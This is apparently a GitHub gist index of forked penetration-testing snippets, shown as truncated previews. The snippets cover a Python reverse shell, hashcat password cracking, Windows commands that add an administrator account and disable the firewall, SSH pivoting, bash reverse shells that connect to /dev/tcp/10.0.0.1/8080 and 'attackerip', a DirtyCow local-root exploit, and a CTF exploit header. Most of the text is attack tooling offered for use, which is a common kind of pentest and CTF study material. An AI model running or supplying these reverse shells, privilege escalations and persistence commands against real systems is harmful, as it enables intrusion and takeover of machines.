@waywardsun
waywardsun / simple_py_shell
Created September 20, 2016 22:46 — forked from sckalath/simple_py_shell
Simple Python Shell
#!/usr/bin/python
# imports here
# Copyright 2012 TrustedSec, LLC. All rights reserved.
#
# This piece of software code is licensed under the FreeBSD license.
#
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.
import socket,subprocess
HOST = '192.168.12.45' # The remote host
PORT = 443 # The same port as used by the server
waywardsun / password_cracking
Created September 20, 2016 22:46 — forked from sckalath/password_cracking
password cracking
#cracks md5(unix) hashes, places found passwords in found.txt, removes them from the hash list and uses the rockyou wordlist
hashcat -m 500 -a 0 -o found.txt --remove hashes.txt /usr/share/wordlist/rockyou.txt
waywardsun / tricks
Created September 20, 2016 22:46 — forked from sckalath/tricks
tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
waywardsun / windows_crap
Created September 20, 2016 22:46 — forked from sckalath/windows_crap
windows crap
#add a user
net user ryan mwcb /add
#add user to local administrators
net localgroup administrators /add ryan
#remove firewall
netsh firewall set opmode disable
#enable remote desktop
waywardsun / ssh_tricks
Created September 20, 2016 22:46 — forked from sckalath/ssh_tricks
ssh kung fu
##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
#Command line:
ssh -D 127.0.0.1:1080 10.0.0.1
#~/.ssh/config:
Host 10.0.0.1
DynamicForward 127.0.0.1:1080
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:
waywardsun / reverse_shells
Created September 20, 2016 22:46 — forked from sckalath/reverse_shells
Reverse shells
#bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
#bash alt
exec /bin/bash 0&0 2>&0
#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
#bash alt 3
waywardsun / cowroot.c
Created October 21, 2016 18:00 — forked from rverton/cowroot.c
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
my slides:
https://github.com/galvanic/talk-slides/blob/master/scapy.ipynb
official docs:
http://www.secdev.org/projects/scapy/demo.html
http://www.secdev.org/projects/scapy/doc/usage.html#sniffing
some tutorials from the internet:
https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdf
https://samsclass.info/124/proj11/proj17-scapy.html
waywardsun / offsec.md
Created May 17, 2017 19:09 — forked from trietptm/offsec.md
Penetrating Testing/Assessment Workflow

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tips and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

waywardsun / toilet-exploit.py
Created June 1, 2017 21:33 — forked from m1ghtym0/toilet-exploit.py
POC exploit for toilet service of FAUST-CTF-2017
#!/usr/bin/env python2
from pwn import *
from re import findall
from random import choice, randint
from string import digits, ascii_uppercase
from hashlib import sha256
from sys import argv, exit
MAX_NAME_LEN = 64